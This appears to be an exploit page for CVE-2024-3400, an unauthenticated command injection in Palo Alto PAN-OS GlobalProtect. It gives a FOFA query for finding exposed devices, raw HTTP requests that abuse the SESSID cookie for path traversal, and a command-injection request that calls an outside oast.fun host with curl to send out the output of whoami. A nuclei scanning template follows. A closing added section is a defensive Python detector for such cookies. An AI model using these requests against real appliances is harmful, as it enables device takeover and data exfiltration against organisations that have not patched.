## Command Execution Vulnerability in PAN-OS Security Appliances (CVE-2024-3400)

The PAN-OS security appliance is a VPN device from Palo Alto Networks. It lets administrators, wherever they are located, protect network security by extending the next-generation security platform to all users. It uses the application platform's capabilities to understand how applications are being used, associates traffic with users and devices, and enforces security policy through next-generation technology to protect that traffic. The Cookie of the login.esp endpoint of its GlobalProtect feature has an unauthenticated remote command execution vulnerability, through which an attacker can take control of the device.

## fofa

```
icon_hash="-631559155"
```

## poc

```
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```

![image](https://github.com/wy876/POC/assets/139549762/d94dec78-deb5-440c-9883-99ec1d954ebe)

## Command Injection

```
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```

## CVE-2024-3400.yaml

```
id: palo-alto-networks-pan-os-command-injection

info:
  name: Palo Alto Networks PAN-OS Command Injection Vulnerability
  author: generated with pdteam AI
  severity: Critical

http:
  - method: POST
    path:
      - "{{BaseURL}}/ssl-vpn/hipreport.esp"
    headers:
      Cookie: "SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.txt;"
      Connection: "close"
      Content-Type: "application/x-www-form-urlencoded"
      Content-Length: "0"
    matchers:
      - type: status
        status:
          - 200

  - method: GET
    path:
      - "{{BaseURL}}/global-protect/portal/images/poc.txt"
    matchers:
      - type: status
        status:
          - 403
```

## Vulnerability Source

- https://github.com/h4x0r-dz/CVE-2024-3400
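
## Detection example

Added example, not part of the original page or the referenced repository: both requests above carry their payload in the `SESSID` cookie sent to `/ssl-vpn/hipreport.esp`, so requests captured at a proxy or WAF can be screened for cookie values that contain path or shell characters. It assumes a legitimate `SESSID` is a GUID; the function names and the sample-request builder `req` are constructed for illustration.

```python
import re
from urllib.parse import unquote

TARGET_PATH = "/ssl-vpn/hipreport.esp"
# Assumption: a legitimate SESSID is a GUID; any other shape is reported.
GUID = re.compile(r"[0-9a-fA-F]{8}(-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}")
SHELL_META = set("`$|&<>(){}\\'\" \t")

def req(cookie, path=TARGET_PATH):
    """Build a constructed sample request (test data, not captured traffic)."""
    return f"POST {path} HTTP/1.1\r\nHost: vpn.example.test\r\nCookie: {cookie}\r\n\r\n"

def sessid_of(raw_request):
    """Return (path, SESSID value); the value is None when the cookie is absent."""
    lines = raw_request.splitlines()
    head = lines[:lines.index("")] if "" in lines else lines
    parts = head[0].split() if head else []
    path = parts[1].split("?", 1)[0] if len(parts) >= 2 else ""
    for line in head[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() != "cookie":
            continue
        for pair in value.split(";"):
            key, _, val = pair.strip().partition("=")
            if key == "SESSID":
                return path, val
    return path, None

def decode(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding so %2F..%2F is not missed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def findings(raw_request):
    """List the reasons a request's SESSID cookie should be investigated."""
    path, sessid = sessid_of(raw_request)
    if path != TARGET_PATH or sessid is None:
        return []
    value = decode(sessid)
    reasons = []
    if ".." in value or "/" in value:
        reasons.append("path-traversal")
    if SHELL_META & set(value):
        reasons.append("shell-metacharacters")
    if not reasons and not GUID.fullmatch(value):
        reasons.append("not-a-guid")
    return reasons
```

`findings()` returns an empty list for a GUID-shaped cookie and for requests to other paths, so it can be mapped over a request capture and only non-empty results reviewed.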